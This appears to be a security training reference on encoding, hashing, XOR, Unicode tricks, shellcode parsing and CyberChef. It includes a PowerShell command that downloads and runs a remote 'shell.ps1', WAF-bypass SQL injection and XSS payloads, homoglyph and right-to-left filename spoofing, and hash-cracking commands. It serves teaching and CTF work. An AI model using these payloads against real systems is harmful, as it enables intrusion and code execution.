    pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'

    # Entry point and image base
    if pe_type == 'PE32+':
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
    else:
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]

    import datetime
    try:
        compile_time = datetime.datetime.utcfromtimestamp(timestamp).isoformat()
    except (OSError, ValueError):
        compile_time = f"raw: {timestamp}"

    return {
        'type': pe_type,
        'machine': MACHINES.get(machine, f'0x{machine:x}'),
        'sections': num_sections,
        'compile_time': compile_time,
        'entry_point_rva': f'0x{entry_rva:x}',
        'image_base': f'0x{image_base:x}',
        'characteristics': f'0x{characteristics:x}',
        'is_dll': bool(characteristics & 0x2000),
        'is_exe': bool(characteristics & 0x0002),
    }

# Usage:
# with open('malware.exe', 'rb') as f:
#     info = parse_pe_header(f.read(1024))

Shellcode extraction and analysis

# Extract shellcode from various formats

def shellcode_from_c_array(c_code: str) -> bytes:
    """Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
    import re
    hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_from_escaped(escaped: str) -> bytes:
    """Parse \\x escape format: \\x6a\\x02\\x58"""
    import re
    hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
    """Convert bytes to C array format."""
    hex_vals = ', '.join(f'0x{b:02x}' for b in data)
    return f'unsigned char {var_name}[] = {{{hex_vals}}};'

def shellcode_to_python(data: bytes) -> str:
    """Convert bytes to Python bytes literal."""
    return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'

# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
    """Find positions of bad characters in shellcode."""
    positions = []
    for i, b in enumerate(shellcode):
        if b in bad_chars:
            positions.append(i)
    return positions

# Common bad characters for testing
ALL_BAD_CHARS = bytes(range(256))  # Generate all bytes, test which get mangled

# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'

# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -

# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test

15. CyberChef Reference

CyberChef is a browser-based data manipulation tool — "The Cyber Swiss Army Knife." All operations run client-side; no data leaves the browser. Source: github.com/gchq/CyberChef (34k+ stars).

Key features

Feature	Description
Drag-and-drop recipes	Chain operations visually
Auto Bake	Real-time output as input/recipe changes
Magic	Auto-detect encoding and suggest decode steps
Breakpoints	Step through recipe stages to inspect intermediate data
File support	Handle files up to ~2 GB
URL sharing	Share complete recipes via URL parameters
Client-side	No data sent to any server

Most-used operations for security work

Category	Operations
Encoding	To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse
URL/HTML	URL Encode/Decode, HTML Entity Encode/Decode
Crypto	AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere
Hashing	MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM
Compression	Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib
Data format	Parse JSON, XML, CSV, protobuf, MessagePack, BSON
Networking	Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP
Analysis	Entropy, Frequency distribution, Detect file type, Strings, Hexdump
Code	JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1
Visual	Render Image, Play Media, Render Markdown
Forensics	Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime
Flow	Fork, Merge, Register, Conditional Jump, Label, Comment

Useful CyberChef recipes (bookmark these)

Decode multi-layer obfuscation:

From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})

Extract IOCs from text:

Extract_IP_addresses -> Defang_IP_Addresses

Decode PowerShell -EncodedCommand:

From_Base64 -> Decode_text('UTF-16LE')

Analyze suspicious file:

Detect_File_Type -> Entropy -> Strings

JWT decode:

JWT_Decode

Timestamp conversion:

From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp

Defang indicators for safe sharing:

Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com

CyberChef from the command line

# Self-host CyberChef (no external dependencies)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npx grunt prod
# Open build/prod/index.html in browser — fully offline

# Or use Docker
docker run -p 8080:8080 ghcr.io/gchq/cyberchef:latest

# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64()]);

Appendix: Quick Conversion Table

From	To	Python	Bash
String	Base64	`base64.b64encode(s.encode())`	`echo -n "s" \| base64`
Base64	String	`base64.b64decode(b).decode()`	`echo "b" \| base64 -d`
String	Hex	`s.encode().hex()`	`echo -n "s" \| xxd -p`
Hex	String	`bytes.fromhex(h).decode()`	`echo "h" \| xxd -r -p`
String	URL	`quote(s, safe='')`	`python3 -c "from urllib.parse import quote; print(quote('s',safe=''))"`
String	HTML	`html.escape(s)`	`python3 -c "import html; print(html.escape('s'))"`
String	MD5	`hashlib.md5(s.encode()).hexdigest()`	`echo -n "s" \| md5sum`
String	SHA256	`hashlib.sha256(s.encode()).hexdigest()`	`echo -n "s" \| sha256sum`
String	NTLM	`hashlib.new('md4',s.encode('utf-16-le')).hexdigest()`	`echo -n "s" \| iconv -t utf-16le \| openssl dgst -md4`
String	ROT13	`codecs.encode(s, 'rot_13')`	`echo "s" \| tr 'A-Za-z' 'N-ZA-Mn-za-m'`
Int	Hex	`hex(n)`	`printf '%x' n`
Hex	Int	`int(h, 16)`	`echo $((16#h))`
Bytes	XOR	`bytes(b^k for b in data)`	`python3 -c "..."`

Appendix: Hash Length Identification

Length	Possible types	Hashcat mode
16	MySQL 3.x	200
32	MD5, NTLM, MD4	0, 1000, 900
40	SHA-1	100
56	SHA-224	1300
64	SHA-256	1400
96	SHA-384	10800
128	SHA-512	1700
32:32	NetNTLMv1	5500
variable	NetNTLMv2	5600
13	DES crypt	1500
34	MD5 crypt ($1$)	500
34	bcrypt ($2a$)	3200
43	SHA-256 crypt ($5$)	7400
86	SHA-512 crypt ($6$)	1800

Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.

Encoding, Decoding & Data Manipulation — Ultimate Reference

CIPHER training material. Every section includes working code examples for Python 3.10+ and/or Bash/PowerShell. Designed for CTFs, forensics, exploit development, and red/blue team operations.

Base Encoding
Hex Encoding
URL Encoding
HTML Entities
Unicode
Hashing
XOR
ROT13 / ROT47 / Caesar
JWT
Regular Expressions for Security
Obfuscation & Deobfuscation
Serialization Security
Compression Security
Binary & Struct Manipulation
CyberChef Reference

1. Base Encoding

Base64

Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.

import base64

# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext)          # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded)            # b'attack at dawn'

# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext)   # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)

# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24"   # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))

# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
    pattern = r'^[A-Za-z0-9+/]*={0,2}$'
    return bool(re.match(pattern, s)) and len(s) % 4 == 0

# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
    encoded_file = base64.b64encode(f.read())

# Bash — encode/decode
echo -n "attack at dawn" | base64                    # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d             # attack at dawn

# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored

# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d

# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes)                    # YXR0YWNrIGF0IGRhd24=

$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded)     # attack at dawn

# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64

Security notes:

Base64 is NOT encryption. Attackers use it to bypass naive content filters.
Double-base64 encoding is common in obfuscated payloads.
Look for Base64 in HTTP headers (Authorization: Basic), cookies, POST bodies.
PowerShell -EncodedCommand accepts UTF-16LE Base64: powershell -enc <base64>.

Base32

Alphabet: A-Z2-7 with = padding. Case-insensitive. Used in TOTP/HOTP secrets, onion addresses.

import base64

encoded = base64.b32encode(b"attack at dawn")   # b'MFYHA3DFNZSCA5DFON2CATQ='
decoded = base64.b32decode(encoded)              # b'attack at dawn'

# Case insensitive decode
decoded = base64.b32decode(b"mfyha3dfnzsca5dfon2catq=", casefold=True)

# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32                    # MFYHA3DFNZSCA5DFON2CATQ=
echo "MFYHA3DFNZSCA5DFON2CATQ=" | base32 -d         # attack at dawn

Base58

No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.

# pip install base58
import base58

encoded = base58.b58encode(b"attack at dawn")   # b'4HDeGkTpAkVKFsmvu'
decoded = base58.b58decode(encoded)              # b'attack at dawn'

# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")

Base85 (Ascii85)

Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.

import base64

# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn")    # b'@UX=hF)rM5Bl7Q+Df'
decoded = base64.a85decode(encoded)

# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn")    # b'VPa!sWo2ML@;IANXJ~X'
decoded = base64.b85decode(encoded)

# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"

Base encoding detection heuristics

Encoding	Alphabet	Padding	Length multiple
Base64	`A-Za-z0-9+/`	`=` (0-2)	4
Base64url	`A-Za-z0-9-_`	`=` or none	4
Base32	`A-Z2-7`	`=` (0-6)	8
Base58	`123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz`	None	Variable
Base85	`!-u` (ASCII 33-117)	None	5 per 4 bytes

2. Hex Encoding

Hex to/from ASCII

# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex()                        # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode())  # '61 74 74 61 63 6b ...'

# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode()  # 'attack at dawn'

# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex.replace(' ', '').replace('\n', ''))

# --- Hexdump (xxd-style) ---
import binascii
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
    chunk = data[i:i+16]
    hex_part = ' '.join(f'{b:02x}' for b in chunk)
    ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
    print(f'{i:08x}  {hex_part:<48}  |{ascii_part}|')

# ASCII to hex
echo -n "attack at dawn" | xxd -p                     # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v

# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p        # attack at dawn

# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20

# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''

# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
    [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)

Hex to/from Binary and Decimal

# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16)              # 3735928559
back_to_hex = hex(decimal)              # '0xdeadbeef'

# Hex <-> Binary
binary = bin(int("ff", 16))             # '0b11111111'
hex_from_bin = hex(int("11111111", 2))  # '0xff'

# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x')         # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16))  # 192.168.1.1

# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'

shellcode_bytes = bytes.fromhex(shellcode_hex)

# Decimal to hex
printf '%x\n' 3735928559                # deadbeef

# Hex to decimal
echo $((16#deadbeef))                   # 3735928559
printf '%d\n' 0xdeadbeef               # 3735928559

# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc  # DEADBEEF

3. URL Encoding

Single encoding

from urllib.parse import quote, unquote, quote_plus, unquote_plus

# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--")           # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--")  # "admin' OR 1=1--"

# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here")     # "search+term+here"
decoded = unquote_plus("search+term+here")   # "search term here"

# Encode everything (even safe characters)
fully_encoded = quote("test", safe='')        # 'test' — all alpha safe by default
fully_encoded = quote("/path/file", safe='')  # '%2Fpath%2Ffile'

Double encoding (WAF bypass)

from urllib.parse import quote

payload = "' OR 1=1--"
single = quote(payload, safe='')        # %27%20OR%201%3D1--
double = quote(single, safe='')         # %2527%2520OR%25201%253D1--

# Server that decodes twice will see the original payload
# First decode:  %27%20OR%201%3D1--
# Second decode: ' OR 1=1--

# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')

Unicode URL encoding

from urllib.parse import quote

# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd")            # standard
encoded = quote("\u2025")                            # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal

# IRI to URI conversion
iri = "https://example.com/path/\u00e9"              # e-acute
uri = quote(iri, safe=':/@')                         # https://example.com/path/%C3%A9

# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not

# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"

# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search

# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"

# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")

# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")

Security notes:

Double encoding bypasses WAFs that decode only once before rule matching.
%00 (null byte) truncates strings in C-based parsers — file.php%00.jpg may bypass extension checks.
%0d%0a = CRLF injection in HTTP headers.
Path normalization differences between proxy and backend enable smuggling.

4. HTML Entities

Named entities

import html

# Encode — only encodes &, <, >, " by default
encoded = html.escape('<script>alert("XSS")</script>')
# '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;'

# Encode with single quotes
encoded = html.escape("it's <dangerous>", quote=True)
# 'it&#x27;s &lt;dangerous&gt;'

# Decode
decoded = html.unescape('&lt;script&gt;alert(1)&lt;/script&gt;')
# '<script>alert(1)</script>'
decoded = html.unescape('&amp;lt;')  # '&lt;'  — only one layer decoded

Numeric (decimal) entities

# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};'             # '&#60;'

# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;...'

# Decode
import html
decoded = html.unescape('&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;')
# '<script>'

Hex entities

# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};'          # '&#x3c;'

# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '&#x3c;&#x69;&#x6d;&#x67;...'

# Mixed encoding (harder for filters)
# &#60;script&#x3e;alert&#40;1&#41;&#60;/script&#x3e;

# Decode all forms
import html
html.unescape('&#x3c;&#60;&lt;')       # '<<<'

# Bash — decode HTML entities
python3 -c "import html; print(html.unescape('&lt;script&gt;'))"

# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"

Security notes:

Browsers decode HTML entities in attribute values: <a href="javascript:alert(1)"> works with entities.
Entity encoding without semicolons works in some browsers: &#60script parsed as <script.
Null bytes in entities:  may bypass filters.
Double encoding: &lt; decodes to < on first pass, < on second.

Quick reference table

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`

5. Unicode

UTF-8 encoding internals

# UTF-8 byte representation
text = "cafe\u0301"     # cafe + combining accent = "cafe\u0301" (visually: "cafe?")
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex())  # 636166 65cc81

# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
    encoded = char.encode('utf-8')
    print(f"U+{ord(char):04X}  {char!r:>10}  {len(encoded)} bytes  {encoded.hex()}")
# U+0041       'A'  1 bytes  41
# U+00E9       'e'  2 bytes  c3a9
# U+4E16      '\u4e16'  3 bytes  e4b896
# U+1F600   '\U0001f600'  4 bytes  f09f9880

# UTF-8 byte ranges
# 0xxxxxxx             -> 1 byte  (U+0000 to U+007F)
# 110xxxxx 10xxxxxx     -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx  -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)

UTF-16 encoding

# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex())    # 630061006c0063002e00650078006500

# Decode
decoded = utf16le.decode('utf-16-le')  # 'calc.exe'

# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>

# UTF-16 BOM detection
data = b'\xff\xfe\x41\x00'   # UTF-16-LE BOM + 'A'
data = b'\xfe\xff\x00\x41'   # UTF-16-BE BOM + 'A'

Punycode (IDN homograph attacks)

# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com"   # Cyrillic 'e' (U+0435) instead of Latin 'e'

# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna')   # b'xn--xample-9uf.com'

# Decode punycode
decoded = b'xn--xample-9uf.com'.decode('idna')  # looks like 'example.com'

# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
    import unicodedata
    scripts = set()
    for char in domain:
        if char in '.-':
            continue
        cat = unicodedata.category(char)
        if cat.startswith('L'):
            # Rough script detection via name
            name = unicodedata.name(char, '')
            if 'CYRILLIC' in name:
                scripts.add('cyrillic')
            elif 'LATIN' in name:
                scripts.add('latin')
            elif 'GREEK' in name:
                scripts.add('greek')
    return len(scripts) > 1

print(has_mixed_scripts("\u0435xample.com"))  # True — mixed Cyrillic + Latin

# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"

# Using idn command (libidn)
echo "xn--xample-9uf.com" | idn --idna-to-unicode 2>/dev/null

Homoglyph attacks

# Characters that look identical but have different codepoints
homoglyphs = {
    'a': ['\u0430'],              # Cyrillic а
    'e': ['\u0435'],              # Cyrillic е
    'o': ['\u043e', '\u006f'],    # Cyrillic о, Latin o
    'p': ['\u0440'],              # Cyrillic р
    'c': ['\u0441'],              # Cyrillic с
    'x': ['\u0445'],              # Cyrillic х
    'H': ['\u041d'],              # Cyrillic Н
    'T': ['\u0422'],              # Cyrillic Т
    'B': ['\u0412'],              # Cyrillic В
    'A': ['\u0391'],              # Greek Α
    'l': ['\u04cf', '\u0049'],    # Cyrillic palochka, Latin I
    '0': ['\u041e'],              # Cyrillic О
    '/': ['\u2044', '\u2215'],    # Fraction slash, Division slash
}

# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
    import random
    result = []
    for char in url:
        if char in homoglyphs and random.random() > 0.5:
            result.append(random.choice(homoglyphs[char]))
        else:
            result.append(char)
    return ''.join(result)

# Detection: normalize and compare
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
    n1 = unicodedata.normalize('NFKC', s1).lower()
    n2 = unicodedata.normalize('NFKC', s2).lower()
    return n1 == n2 and s1 != s2

Zero-width characters (steganography / watermarking)

# Zero-width characters are invisible but present in text
ZWSP = '\u200b'    # Zero-Width Space
ZWNJ = '\u200c'    # Zero-Width Non-Joiner
ZWJ  = '\u200d'    # Zero-Width Joiner
ZWNS = '\ufeff'    # Zero-Width No-Break Space (BOM)

# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
    """Encode secret as zero-width characters between visible text."""
    bits = ''.join(f'{b:08b}' for b in secret.encode())
    zw_str = ''
    for bit in bits:
        zw_str += ZWJ if bit == '1' else ZWSP
    return zw_str

def zw_decode(text: str) -> str:
    """Extract zero-width encoded secret from text."""
    bits = ''
    for char in text:
        if char == ZWJ:
            bits += '1'
        elif char == ZWSP:
            bits += '0'
    byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
    return bytes(byte_list).decode('utf-8', errors='ignore')

# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data

# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
    zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
                '\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
                '\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
    found = []
    for i, char in enumerate(text):
        if char in zw_chars:
            found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
    return found

# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
    return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)

Unicode normalization attacks

import unicodedata

# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another

s = "file\u0000.txt"          # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC

# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e'))  # '..'
print(unicodedata.normalize('NFKC', '\uff1c'))         # '<'
print(unicodedata.normalize('NFKC', '\uff1e'))         # '>'

# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e   (fullwidth < and >)
# Backend normalizes NFKC: <script>  -> XSS

# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png  (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe  (is actually .exe)

6. Hashing

MD5 (128-bit, BROKEN for collision resistance)

import hashlib

# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'

# File hash
def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            h.update(chunk)
    return h.hexdigest()

echo -n "password" | md5sum                       # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd                                 # file hash

$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()

Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe

SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)

sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'

echo -n "password" | sha1sum
sha1sum /bin/ls

SHA-256 (256-bit, current standard)

sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'

# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()

echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls

# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"

SHA-512 (512-bit)

sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'

echo -n "password" | sha512sum

NTLM (Windows password hash)

import hashlib

def ntlm_hash(password: str) -> str:
    """Compute NTLM hash (MD4 of UTF-16LE password)."""
    return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()

print(ntlm_hash("Password1"))
# 'a4f49c406510bdcab6824ee7c30fd852'

# LM hash (legacy, DES-based, extremely weak)
# Splits password into two 7-char halves, uppercases, DES encrypts "KGS!@#$%"
# Not shown — do not use LM in any modern system

# NTLM hash with Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"

# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null

Net-NTLMv2 (challenge-response, captured on the wire)

import hashlib
import hmac
import os

def compute_ntlmv2_response(password: str, user: str, domain: str,
                             server_challenge: bytes, client_challenge: bytes = None) -> str:
    """Compute Net-NTLMv2 response (simplified)."""
    if client_challenge is None:
        client_challenge = os.urandom(8)

    # Step 1: NTLM hash
    nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()

    # Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
    identity = (user.upper() + domain).encode('utf-16-le')
    ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()

    # Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
    # blob is complex in practice; simplified here
    blob = server_challenge + client_challenge
    ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()

    return ntlmv2_response

# Hashcat format for cracking Net-NTLMv2:
# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt

Multi-hash utility

import hashlib

def multi_hash(data: bytes) -> dict[str, str]:
    """Compute multiple hashes simultaneously."""
    algorithms = ['md5', 'sha1', 'sha256', 'sha512']
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}

result = multi_hash(b"password")
for algo, digest in result.items():
    print(f"{algo:>8}: {digest}")

# Hash identification by length
HASH_LENGTHS = {
    32: ['MD5', 'NTLM', 'MD4'],
    40: ['SHA-1'],
    56: ['SHA-224'],
    64: ['SHA-256'],
    96: ['SHA-384'],
    128: ['SHA-512'],
}

def identify_hash(h: str) -> list[str]:
    """Identify possible hash type by length."""
    h = h.strip()
    length = len(h)
    candidates = HASH_LENGTHS.get(length, ['Unknown'])
    # Additional heuristics
    if length == 32 and ':' not in h:
        # Could be MD5 or NTLM — check context
        pass
    return candidates

# Compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null

# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'

7. XOR

Single-byte XOR

def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)

# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex())   # '233626233a2962223626622327'...'

# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext

Multi-byte XOR

from itertools import cycle

def xor_multi_byte(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating multi-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
